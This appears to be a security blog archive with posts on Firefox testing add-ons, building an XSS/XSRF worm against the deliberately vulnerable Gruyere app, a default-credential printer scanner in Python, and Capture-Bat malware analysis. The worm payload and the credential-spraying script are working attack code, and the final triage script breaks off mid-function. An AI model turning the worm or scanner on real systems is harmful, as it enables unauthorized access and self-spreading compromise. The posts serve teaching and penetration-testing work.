Author Archive

Firefox add-ons for web app assessments

Friday, February 4th, 2011

These add-ons are mainly related to web application security. You see lists like this for Firefox add-ons all the time, but these are the ones that I think are the most helpful. Firefox has a nice category called web application security penetration testing that has a lot of the plugins I’ll mention. Not all plugins in this category are worthwhile, which is why I’m sharing my list.

Detecting cross site scripting

XSS – me

Acunetix xss scanner

I’ve included the link to the Acunetix add-on from my site. You have to sign up with Acunetix in order to receive the add-on and even then it comes bundled with an executable. If for some reason my link doesn’t work with your version of firefox then simply go to the Acunetix site and download their latest version.

Detecting sql injection

SQL inject me

Developer tools are always handy to have because if you can build it you can break it. The Web Developer add-on will let you easily see hidden form fields, JavaScript, cookies, etc. Firebug will let you see how the application is built by simply mousing over the layout. Firebug is also a debugger and will let you set breakpoints in JavaScript; both are a must have.

Firebug

Web developer

Modification tools: if you want to modify a request before it’s sent to the server, Tamper Data is a great tool inside the browser for the job. User Agent Switcher will allow you to pretend to be any browser you’d like (don’t forget the Starbucks iPhone problem). Add N Edit Cookies is another modification tool that will allow you to easily change cookies, so that you can use a cookie you have obtained to impersonate that user.

Tamper data

User agent switcher

Add n edit cookies

Miscellaneous add-ons: Show IP is a great add-on that will show you the IP address you are connecting to. This may seem lame at first, but when you are assessing multiple environments or malware it is always handy. Leet Key is another great tool inside the browser that will perform encoding (base64, URL, rot13, etc.) and even generate hashes.

Show IP

Leet key

Notable mentions

Foxy proxy

Noscript

If you have any other recommendations please let me know.

How to write a web app worm

Saturday, November 6th, 2010

When I say web app worm I mean a worm specific to one web site, such as Twitter. Twitter has been picked on (they should be, because it’s a meaningless app) when it comes to web app worms, so why stop now. There are other types of worms that could involve web servers and databases, but those won’t be addressed in this write-up. The web app I’ll pick on for this example is Gruyere. Gruyere is an intentionally vulnerable application that a handful of folks over at Google wrote to point out some of the major vulnerabilities within web applications. Gruyere is very Twitter-like, so my example is relevant to other applications that function in similar ways.

Most web site worms spread because the web application allows JavaScript to be inserted somewhere. For example, in Twitter when a status is updated (via a moronic “tweet”) you are allowed to insert words, sentences, and even links to other interesting sites. If Twitter allows you to input all this information, what do they block? JavaScript is a well known programming language that you should never allow to be inserted into your web application. Even though many web developers know this, they continually make mistakes and allow JavaScript to be inserted into their web apps. There are different categories of JavaScript attacks such as XSS and XSRF; I’m not a big fan of this naming convention, but you should be familiar with the terms and what they mean. Almost all web app worms are spread via the XSRF attack. Basically an XSRF attack is where JavaScript (possibly other languages) is inserted into the web app, and that JavaScript then makes a request on behalf of the user. This request could be malicious in nature or, in the case of the Twitter worm examples, just for fun. The example I’ll be going over will be a classic XSRF attack where I’ll insert JavaScript to make requests on behalf of the user.

Let’s get started. I went ahead and created several accounts within Gruyere to demo the attack, in this case Travis will be the attacker.

To create a web app worm you first need to discover a vulnerability within a web app that allows you to insert JavaScript. Luckily the “New Snippet” functionality will allow us to insert JavaScript. Finding vulnerable input that allows you to insert JavaScript may not be that easy. In order to successfully insert JavaScript you’ll need to be able to insert certain characters such as “<” and “>”. One great tool for finding which of these characters get through, which will in turn find vulnerabilities, is the Firefox add-on named “XSS Me”. XSS Me will tell you if an input will allow certain characters. So now that we have vulnerable input, how do we get this worm started? As the attacker I will place the following link into a new snippet.

All I’m doing here is creating a link to my evil code; to create a worm you don’t have to keep your evil code in another location, you could insert all the evil code you need into the vulnerable web app itself. Most of the time inserting all of your evil code into the app itself would be ideal, but it really depends on what the vulnerable app will allow you to do. Now that we’ve inserted a link to our evil code, what exactly does our evil code look like? Below is the source code of evil.html.

1   <p <body onload="Wait();"><img src="http://google-gruyere.appspot.com/251625447516/newsnippet2?snippet=%3Ca%20href%3D%22http%3A%2F%2Ftravisaltman.com%2Fevil.html%22%3Ekitten%20videos%3C%2Fa%3E">
2   <script>
3   function Redirect()
4   {
5   window.location="http://google-gruyere.appspot.com/251625447516/";
6   }
7   function Wait()
8   {
9   setTimeout("Redirect()", 1000);
10  }
11  </script>

Now let’s break evil.html down line by line. All the magic is happening in line one. The first thing written is the HTML paragraph tag “<p”; this is done specifically for this app, because anything after a <p> tag is allowed to contain other characters. Next is the HTML body tag with an “onload” action. An action (event handler) in malicious code is common so that the attacker can perform other steps; another common event is onmouseover. Once the page loads it will call the “Wait” function, which we’ll come back to in just a bit. After the body tag is the image tag (<img>), which makes the XSRF request for me. The request adds a new snippet for whomever clicks on the link. In this case if a victim were to click on my link it would create a new snippet for them with a link saying “kitten videos”. To add a new snippet within Gruyere the URL would be the following:

http://google-gruyere.appspot.com/251625447516/newsnippet2?snippet=

Anything after the equal sign will show up as a new snippet, so I inserted the following “malicious” snippet:

%3Ca%20href%3D%22http%3A%2F%2Ftravisaltman.com%2Fevil.html%22%3Ekitten%20videos%3C%2Fa%3E

So what does all that mess mean? If you take all that mess and URL decode it you get the following:

<a href="http://travisaltman.com/evil.html">kitten videos</a>

In this case I had to URL encode my attack so that it would work; this is not uncommon when performing these types of attacks. So as the attacker I’m placing a link inside a new snippet for the victim that says “kitten videos”, but that link is still pointing to my evil.html. Now let’s get back to the Wait function. I won’t break it down line by line, but what happens is that when the page fully loads the code jumps to the Wait function on line seven. setTimeout then fires after one second and calls the Redirect function, and the Redirect function redirects the user to the home page of Gruyere. The whole point of everything after line one is simply to redirect the user back to the homepage after the attack. So now that we have planted the seed of the attack, let’s see what happens when Alice clicks on our evil link.

Just by clicking on our “evil” link Alice created a snippet that she herself didn’t write; it was our malicious JavaScript that created the link. Now let’s log in as Bob and click on “kitten videos” in Alice’s snippets.

Bob has now updated his snippets just by clicking on the link in Alice’s snippet. You can now see how this can snowball, much like other web app worms have spread. So in only a few lines of code I have created a worm that will replicate throughout the application, infecting whomever clicks on my malicious link. The Twitter worm was very simple as well. I could just as easily have made it so that a user who simply viewed my snippet would get infected. Once you allow JavaScript to be inserted into your app there are a number of things an attacker can do to manipulate your application.
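As an added example from the developer’s side (my own sketch, not Gruyere’s code), here is how a snippet handler can close both doors this worm walks through: it refuses the GET that an <img src> can make, demands a per-session CSRF token the browser will not attach on its own, and HTML-escapes the snippet on output so the post’s own “kitten videos” payload renders as inert text. The request/session dicts and the function names are assumptions made for the demo.

```python
import hmac
import html
import secrets
from urllib.parse import unquote

# The URL-encoded payload from the post's <img src=...> request, verbatim.
WORM_SNIPPET = ("%3Ca%20href%3D%22http%3A%2F%2Ftravisaltman.com%2Fevil.html"
                "%22%3Ekitten%20videos%3C%2Fa%3E")


def decode_snippet(encoded):
    """What the server sees once the query parameter is URL-decoded."""
    return unquote(encoded)


def issue_csrf_token(session):
    """Put a fresh random token in the session; the real form echoes it back."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def render_snippet(snippet):
    """Output encoding: '<', '>', '&' and quotes lose their HTML meaning."""
    return "<p>%s</p>" % html.escape(snippet, quote=True)


def handle_new_snippet(request, session, store):
    """Hypothetical hardened newsnippet2 handler; returns (status, body).

    request = {"method": ..., "form": {...}}, session = {"csrf": ...},
    store = list the accepted snippets are appended to.
    """
    # 1) An <img src> or a plain link can only issue a GET, so a state change
    #    is only accepted over POST.
    if request["method"] != "POST":
        return 405, "state-changing requests must be POST"
    # 2) The browser attaches cookies on its own but not the page's token, so
    #    a request forged from another site arrives without it.
    sent = request["form"].get("csrf", "")
    expected = session.get("csrf", "")
    if not expected or not hmac.compare_digest(sent, expected):
        return 403, "missing or invalid CSRF token"
    # 3) Keep the raw text, but never echo it back unescaped.
    snippet = request["form"].get("snippet", "")
    store.append(snippet)
    return 200, render_snippet(snippet)


def demo():
    """Replay the worm's request three ways; returns (status codes, last body)."""
    session, store = {}, []
    payload = decode_snippet(WORM_SNIPPET)
    # (a) exactly what the victim's browser sends when evil.html's <img> loads
    forged_get = {"method": "GET", "form": {}, "query": {"snippet": payload}}
    # (b) a forged POST: the attacker cannot read the victim's session token
    forged_post = {"method": "POST", "form": {"snippet": payload}}
    # (c) the genuine form submission, carrying the token the page was issued
    token = issue_csrf_token(session)
    genuine = {"method": "POST", "form": {"snippet": payload, "csrf": token}}
    outcomes = [handle_new_snippet(r, session, store)
                for r in (forged_get, forged_post, genuine)]
    return [status for status, _ in outcomes], outcomes[-1][1]


if __name__ == "__main__":
    statuses, body = demo()
    print(statuses)  # [405, 403, 200]
    print(body)      # the <a ...> arrives as harmless text, not a live link
```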

Hopefully this small write-up at least somewhat explains how web app worms get created and how simple they can be. Developers of major applications such as Twitter need to better test and review the code they have written. As one of my links points out, a seventeen year old kid exploited the mighty Twitter, which just goes to show you how well major applications are focusing on their security. As a user, never click on a link you don’t trust, and turn off JavaScript for web apps that don’t need JavaScript in the first place. If another worm pops up in Twitter or Facebook I won’t be sad.

Python script to check for vulnerable printers

Thursday, June 17th, 2010

People often overlook printers when it comes to information security. The truth is that a ton of useful information can be found on printers. Employees will often scan sensitive documents such as social security cards, loan information, birth certificates, etc. I’ve also seen important organizational information on printers, such as internal memos between higher-up executives. The documents I’ve seen in the past were never meant to be shared, but a default printer will more than happily share your sensitive information. Almost any new commercial printer will come with a ton of features to store and retrieve any documentation that flows through the printer (copy, scan, and print jobs). Almost all of these new printers also give you a web interface to retrieve that documentation; an example of a printer’s web interface can be seen here. When I’m performing a penetration test I always go for the web interface of a printer, because the web interface is where I can grab all the sensitive information. These printers usually get unboxed and plugged into the network without much configuration from the default state, which means that the web interface is wide open with default usernames and passwords. Usually admin access to these printers will give you more access, and it’s this admin access that I check for.

When you’ve only got a limited amount of time during a penetration test you want to get the best bang for your buck, so I created a Python script that will go and check for default usernames and passwords on certain models of printers. Below is the Python script.

import urllib2
import sys

# First argument: a file with one IP per line. Second: where successful logins go.
target = open(sys.argv[1])
eachIPinList = target.readlines(); target.close()
output = open(sys.argv[2], 'w')

for string in eachIPinList:
  try:
    print 'Trying ' + string.rstrip()

    # The three values to change for the printer model you are checking.
    theurl = 'http://' + string.rstrip() + '/index.html'
    username = 'root'
    password = ''

    # Attach the default credentials as HTTP Basic auth and request the page.
    passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
    passman.add_password(None, theurl, username, password)
    authhandler = urllib2.HTTPBasicAuthHandler(passman)
    opener = urllib2.build_opener(authhandler)
    urllib2.install_opener(opener)
    pagehandle = urllib2.urlopen(theurl, timeout=5)  # don't hang on dead hosts
    if pagehandle.getcode() == 200:
      output.write(string)  # login worked: record the IP (newline still attached)
  except Exception:
    pass  # 401, connection refused, timeout, etc.: not logged, move on

output.close()

Usage: at the command line type the following

python nameOfScript.py IPlist.txt output.txt

So this script takes two arguments: 1) a list of IPs you’ll want to test against, 2) the name of an output file where successful attempts are logged. If you’re having trouble running the script, read my other post about running a Python script. The output.txt will contain a list of IPs that the script was able to log into. There are three variables that you’ll have to modify for the particular printer model you are trying to scan for on your network; they are listed below.

theurl = 'http://' + string.rstrip()  + '/index.html'
username = 'root'
password = ''

The username and password variables should be obvious: simply put in the default username and password of the printer on your network. The only thing you’ll have to change in the ‘theurl’ variable is the last quoted string. In my case it was ‘/index.html’; in your case it could be ‘/auth/login.html’. The variable ‘theurl’ builds the HTTP request used to log into your printer’s web interface. A full example is below.

http://192.168.1.5/index.html

This script is doing nothing more than trying to log into the web interface of a printer, that’s it. So the script is not limited to printers; it can be used against any web application that takes a username and password. Although this script can be used against any web application, there is a limitation. This script authenticates to the printer using Basic Access Authentication. There are three main ways to authenticate to a web application.

  1. HTTP Basic Access Authentication
  2. HTTP Digest Access Authentication
  3. HTML Form-based Authentication

So this script will not work if your web application (printer in this case) is using the second or third option. How would you know which one your printer or web application is using? Turns out OWASP has a nice write-up on how to test which type of authentication your web application is using. Turns out that no one really uses one and two because they are not as secure as HTML form-based authentication wrapped inside SSL. Of course some printers use Basic Authentication because they are poorly built. Basic Authentication actually passes your username and password essentially in plaintext; the only way it tries to hide your username and password is by base64 encoding them, which is easily transformed back into plaintext. I don’t want to get lost in the weeds too much, but just knowing that your printer is using Basic Authentication is bad enough. Even if you set a strong username and password, anyone sniffing network traffic would be able to determine your credentials.
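As an added example (mine, not the post’s script), the three authentication types above can be told apart from a single captured login-page response, which is what you want when inventorying printers for the weak case the post describes: Basic auth over plain HTTP. The responses below are constructed stand-ins for three lab printers, the risk wording is my own, and the decoder at the end shows why Basic credentials are plaintext to anyone watching the wire.

```python
import base64
import re


def classify_auth(status, headers, body):
    """Classify a login response as 'basic', 'digest', 'form', 'other' or 'none'.

    headers: dict of response headers (looked up case-insensitively);
    body: the HTML text, only consulted when there is no HTTP challenge.
    """
    challenge = ""
    for name, value in headers.items():
        if name.lower() == "www-authenticate":
            challenge = value
            break
    if status == 401 and challenge:
        scheme = challenge.split(None, 1)[0].lower()
        return scheme if scheme in ("basic", "digest") else "other"
    # No HTTP challenge: a password field in the HTML means form-based login.
    if re.search(r"<input[^>]+type\s*=\s*[\"']?password", body, re.IGNORECASE):
        return "form"
    return "none"


def decode_basic_authorization(header_value):
    """Recover (user, password) from an 'Authorization: Basic ...' header.

    Basic auth only base64-encodes 'user:password'; nothing is encrypted,
    which is why it must never travel over plain HTTP.
    """
    scheme, _, blob = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic Authorization header")
    user, _, password = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, password


def assess(url, status, headers, body):
    """Return (auth_type, verdict) for one printer web interface."""
    kind = classify_auth(status, headers, body)
    over_plain_http = url.lower().startswith("http://")
    if kind == "basic" and over_plain_http:
        verdict = "HIGH: Basic auth over HTTP, credentials readable on the wire"
    elif kind == "basic":
        verdict = "MEDIUM: Basic auth; TLS protects the wire, check for defaults"
    elif kind == "digest":
        verdict = "MEDIUM: Digest auth; check for default credentials"
    elif kind == "form":
        verdict = "INFO: form login; confirm it is only served over HTTPS"
    else:
        verdict = "INFO: no login prompt on this page, try other paths"
    return kind, verdict


# Constructed responses standing in for three printers on a lab network
# (status, headers, body). The paths match the ones discussed in the post.
SAMPLES = {
    "http://192.168.1.5/index.html": (
        401, {"WWW-Authenticate": 'Basic realm="printer"'}, ""),
    "http://192.168.1.6/index.html": (
        401, {"WWW-Authenticate": 'Digest realm="printer", nonce="abc"'}, ""),
    "https://192.168.1.7/auth/login.html": (
        200, {"Content-Type": "text/html"},
        '<form method="post"><input name="u"><input type="password" name="p"></form>'),
}


def assess_all(samples=SAMPLES):
    """Run assess() over every captured response; returns {url: (kind, verdict)}."""
    return {url: assess(url, *resp) for url, resp in samples.items()}


if __name__ == "__main__":
    for url, (kind, verdict) in assess_all().items():
        print(url, kind, verdict)
    # 'cm9vdDo=' is base64 of 'root:', the post's default user with an empty password.
    print(decode_basic_authorization("Basic cm9vdDo="))  # ('root', '')
```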

I kicked this script over to Dave Huggins, who has tons of experience developing Python applications, and he quickly improved upon it by adding the ability to take an IP range instead of a file. His enhancements can be seen below.

def IPRange(octets, func=""):
  # Expand an address such as 192.168.1.1-254 (any octet may be a "lo-hi"
  # range), call func() on every address and collect the return values.
  if func == "":
    def func(address):
      pass

  octets = octets.split('.')
  ranges = []
  for loop, octet in enumerate(octets):
    if octet.find('-') != -1:
      spot = octet.find('-') + 1
      octets[loop] = int(octet[:octet.find('-')])
      ranges.append(int(octet[spot:]) + 1)
    else:
      octets[loop] = int(octet)
      ranges.append(int(octet) + 1)
  output = []
  for one in range(octets[0], ranges[0]):
    for two in range(octets[1], ranges[1]):
      for three in range(octets[2], ranges[2]):
        for four in range(octets[3], ranges[3]):
          CurrentAddress = '.'.join(str(x) for x in (one, two, three, four))
          output.append(func(CurrentAddress))
  return output

if __name__ == '__main__':
  import sys, urllib2

  def defaultPrinter(ipAddress):
    # Same Basic-auth login attempt as the first script, one address at a time.
    try:
      print 'Trying ' + ipAddress
      theurl = 'http://' + ipAddress + '/indexConf.html'
      username = 'root'
      password = ''

      passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
      passman.add_password(None, theurl, username, password)
      authhandler = urllib2.HTTPBasicAuthHandler(passman)
      opener = urllib2.build_opener(authhandler)
      urllib2.install_opener(opener)
      pagehandle = urllib2.urlopen(theurl, timeout=5)  # don't hang on dead hosts
      if pagehandle.getcode() == 200:
        output.write(ipAddress + '\n')  # one successful IP per line
    except Exception:
      pass

  # Usage (range form): python nameOfScript.py 192.168.1.1-254 output.txt
  output = open(sys.argv[2], 'w')
  IPRange(sys.argv[1], defaultPrinter)
  output.close()

Happy printer hunting.

Malware analysis tool, Capture-Bat

Wednesday, April 14th, 2010

The main purpose of this write-up is to create a tutorial for installing, running, and analyzing the results of Capture-Bat. I didn’t really want to name this article “Capture-Bat tutorial” because not everyone is familiar with the tool and what it’s used for. When it comes to analyzing malware there are a handful of tools that every analyst should have, and Capture-Bat is one of those tools. Capture-Bat will monitor changes malware makes to your system so that you can effectively determine what the malware is attempting to do. Capture-Bat does a great job of eliminating noise and ignoring “regular” Windows events. It is a behavioral analysis tool, which means that it does not analyze the malware itself; it only monitors changes the malware makes to the Windows system. In this article I hope to highlight the best way to use the tool and what options I always use when running it. Capture-Bat is a free tool which can be grabbed here. I’ll get into all the details later, but whenever I run this tool I execute the following command right before I execute the malware.

C:\Program Files\Capture\CaptureBAT.exe -c -n -l c:\temp\output.txt

Below is what the options mean.

-c   capture any deleted or modified files

-n   capture network activity

-l   save output to a specified location (lowercase L)

Let’s walk through an example using the zipped up malware located here (the password is “malware”). For the inexperienced, keep in mind you’ll need to run this malware in a virtual machine environment that is not connected to a network. Now that you’ve downloaded the malware, open up two command prompts in Windows (Start > Programs > Accessories > Command Prompt). In the first command prompt you’ll need to start up Capture-Bat with the command above. Once you run this command you should see the following.

C:\Program Files\Capture>CaptureBAT.exe -c -n -l c:\temp\output.txt
Option: Collecting modified files
Option: Capturing network packets
Option: Logging system events to c:\temp\output.txt
Loaded kernel driver: CaptureProcessMonitor
Loaded kernel driver: CaptureRegistryMonitor
Loaded filter driver: CaptureFileMonitor
Creating network dumper
Loading network packet dumper
network adapter found: 192.168.94.130
---------------------------------------------------------

My output is going to c:\temp; you may have to create this directory before running the command. It looks like Capture-Bat is just sitting there, but it’s actually monitoring changes to your system. It’s important to only run the malware while Capture-Bat is monitoring your system; if you launch another application it will muddy your output and you may not be able to tell whether it’s the malware or a benign application making changes to your system. Now that Capture-Bat is monitoring, let’s go ahead and run our malware. I’m a fan of running exe’s from the command line because you may get more verbose output, so execute the command below to launch the malware.

C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe

After you execute the malware let Capture-Bat sit there and monitor events for about 30 seconds to one minute; after that time period simply go into the command prompt running Capture-Bat and press “control + c” to kill the Capture-Bat process. The next step is to open up our output.txt to see what the malware has done to the system; my output is below.

1  "12/4/2010 11:30:36.81","process","created","C:\WINDOWS\system32\cmd.exe","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
2  "12/4/2010 11:30:37.222","file","Write","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\spoolsvc.exe"
3  "12/4/2010 11:30:37.222","file","Write","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\spoolsvc.exe"
4  "12/4/2010 11:30:37.222","file","Write","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\spoolsvc.exe"
5  "12/4/2010 11:30:37.222","file","Write","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\temp\zcbgjy.bat"
6  "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass"
7  "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName"
8  "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet"
9  "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass"
10 "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName"
11 "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet"
12 "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache"
13 "12/4/2010 11:30:37.300","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies"
14 "12/4/2010 11:30:37.347","process","created","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\cmd.exe"
15 "12/4/2010 11:30:37.378","process","created","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\spoolsvc.exe"
16 "12/4/2010 11:30:37.331","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3f04edc3-85c6-11de-af20-806d6172696f}\BaseClass"
17 "12/4/2010 11:30:37.347","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{cb7e6034-4640-11df-b8d9-806d6172696f}\BaseClass"
18 "12/4/2010 11:30:37.347","registry","SetValueKey","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3f04edc0-85c6-11de-af20-806d6172696f}\BaseClass"
19 "12/4/2010 11:30:37.347","file","Write","System","C:\WINDOWS\system32\spoolsvc.exe"
20 "12/4/2010 11:30:37.362","file","Write","System","C:\WINDOWS\system32\spoolsvc.exe"
21 "12/4/2010 11:30:37.362","file","Write","System","C:\WINDOWS\system32\spoolsvc.exe"
22 "12/4/2010 11:30:37.597","process","terminated","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\cmd.exe"
23 "12/4/2010 11:30:37.581","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
24 "12/4/2010 11:30:37.581","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
25 "12/4/2010 11:30:37.581","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
26 "12/4/2010 11:30:37.581","file","Delete","C:\WINDOWS\system32\cmd.exe","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
27 "12/4/2010 11:30:37.581","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\temp\zcbgjy.bat"
28 "12/4/2010 11:30:37.597","file","Delete","C:\WINDOWS\system32\cmd.exe","C:\temp\zcbgjy.bat"
29 "12/4/2010 11:30:38.362","file","Write","System","C:\Program Files\Capture\logs\deleted_files\C\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
30 "12/4/2010 11:30:38.472","file","Write","System","C:\Program Files\Capture\logs\deleted_files\C\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
31 "12/4/2010 11:30:38.487","registry","SetValueKey","C:\WINDOWS\system32\spoolsvc.exe","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Spooler SubSystem App"
32 "12/4/2010 11:30:39.472","file","Write","System","C:\Program Files\Capture\logs\deleted_files\C\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
33 "12/4/2010 11:30:39.472","file","Write","System","C:\Program Files\Capture\logs\deleted_files\C\temp\zcbgjy.bat"

The first line is simply us executing the malware. Lines 2-4 are where the malware creates a file, an exe in this case, named spoolsvc.exe. Spoolsvc.exe doesn’t already exist on Windows systems but spoolsv.exe does, so the malware author is trying to be tricky by creating an exe with a name very similar to what already exists on the system. It’s very important to note that spoolsvc.exe is not executed here but simply created; had it been executed you would have seen “process”,”created” as is seen in line one. Spoolsvc.exe is eventually executed on line 15. Line five is where a “.bat” file is created; for those that don’t know, “.bat” files are Windows batch scripts which contain a series of commands to be executed. Capture-Bat ends up saving this batch script, which we will take a look at later. Lines 6-13 are where the malware is setting registry values. It appears that lines 6-11 are ensuring the “Local Intranet” zone has certain settings (see the IE settings screen shot below) in Internet Explorer; this will allow internal connections to have a lower security setting than external connections.

My virtual machine is set up in a default and vulnerable state, and my registry values for lines 6-11 didn’t change after the malware was executed. I also intentionally changed these settings before the malware executed, but the malware failed to modify the registry, so go figure. McAfee states that these settings are used to bypass firewalls? More information about Internet Explorer security settings and registry values can be found here. There is also good information here about IE security zones. Lines 12 and 13 are modifying where temporary internet files and cookies are stored; in my case I didn’t notice a difference between before and after. I also modified the default location where temporary internet files are stored, and the malware failed to change this location after execution, so go figure once again. I haven’t contacted the developers of Capture-Bat, but could “SetValueKey” also be used to query the registry? Either way the values stayed the same for me; it could have been that the malware authors wanted the registry settings for cache and cookies in a default state? Lines 14-15 are having cmd.exe execute the malware spoolsvc.exe. Lines 16-18 are setting a value in the registry. Once again these values did not change for me after the malware was executed, and it appears that “Driver” is the default value for BaseClass? I haven’t yet figured out why this piece of malware sets the value of BaseClass to Driver, but I have seen other malware perform these same actions. In lines 19-30 the malware and Capture-Bat delete and create certain files and processes, so hopefully that output is clear to you.

It gets interesting again on line 31. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ is the location of exe’s set to run when a user logs into the system. It is very common to see malware modify these registry values to have itself execute once the user logs into the system. In this case it only modified the Spooler SubSystem App value, but it’s common to see it modify other values in that location. The last two lines of the output are Capture-Bat saving deleted files. So that’s a basic analysis of this malware. I only let the malware run for about 30 seconds, so it may actually perform more actions than my output shows.
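The walk-through above is exactly the kind of reading a small triage script can do for you on every Capture-Bat run. This is an added example of mine, not part of Capture-Bat: it parses the tool’s quoted CSV lines and flags the four behaviours discussed (a near-miss name written into system32, the sample spawning a child process, the sample deleting itself, and a Run-key write). The sample input is a subset of the output shown above, embedded so the script runs offline; the rule names and the list of imitated system binaries are my own choices.

```python
import csv
import io

# A subset of the Capture-Bat output shown above (post lines 1, 2, 5, 15, 26
# and 31), embedded as constructed sample input so the script runs offline.
SAMPLE_LOG = r'''"12/4/2010 11:30:36.81","process","created","C:\WINDOWS\system32\cmd.exe","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
"12/4/2010 11:30:37.222","file","Write","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\spoolsvc.exe"
"12/4/2010 11:30:37.222","file","Write","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\temp\zcbgjy.bat"
"12/4/2010 11:30:37.378","process","created","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe","C:\WINDOWS\system32\spoolsvc.exe"
"12/4/2010 11:30:37.581","file","Delete","C:\WINDOWS\system32\cmd.exe","C:\temp\40033d8063564d1b3e4b41f1d5c9a31f.exe"
"12/4/2010 11:30:38.487","registry","SetValueKey","C:\WINDOWS\system32\spoolsvc.exe","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Spooler SubSystem App"
'''

# Real Windows binaries that malware likes to imitate with near-miss names.
SYSTEM_BINARIES = {"spoolsv.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                   "services.exe", "winlogon.exe", "explorer.exe"}


def parse_capture_log(text):
    """Turn Capture-Bat's quoted CSV lines into dicts; malformed lines are skipped."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue
        time, kind, action, source, target = row
        events.append({"time": time, "kind": kind, "action": action,
                       "source": source, "target": target})
    return events


def edit_distance(a, b):
    """Levenshtein distance, used to catch spoolsvc.exe next to spoolsv.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def basename(path):
    """Last path component, lower-cased, for Windows paths on any host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events):
    """Return (rule, target, detail) findings worth a second look.

    The sample is taken to be the target of the first 'process created'
    event, i.e. the file the analyst launched from cmd.exe.
    """
    sample = next((e["target"] for e in events
                   if e["kind"] == "process" and e["action"] == "created"), "")
    findings = []
    for e in events:
        kind, action, src, tgt = e["kind"], e["action"], e["source"], e["target"]
        if kind == "file" and action == "Write" and src != "System" \
                and "\\windows\\system32\\" in tgt.lower():
            name = basename(tgt)
            near = sorted(b for b in SYSTEM_BINARIES
                          if b != name and edit_distance(name, b) <= 1)
            findings.append(("lookalike-system-binary" if near else "system32-write",
                             tgt, near[0] if near else None))
        if kind == "process" and action == "created" and sample \
                and src.lower() == sample.lower():
            findings.append(("child-process", tgt, None))
        if kind == "file" and action == "Delete" and sample \
                and tgt.lower() == sample.lower():
            findings.append(("self-delete", tgt, None))
        if kind == "registry" and action == "SetValueKey" \
                and "\\currentversion\\run\\" in tgt.lower():
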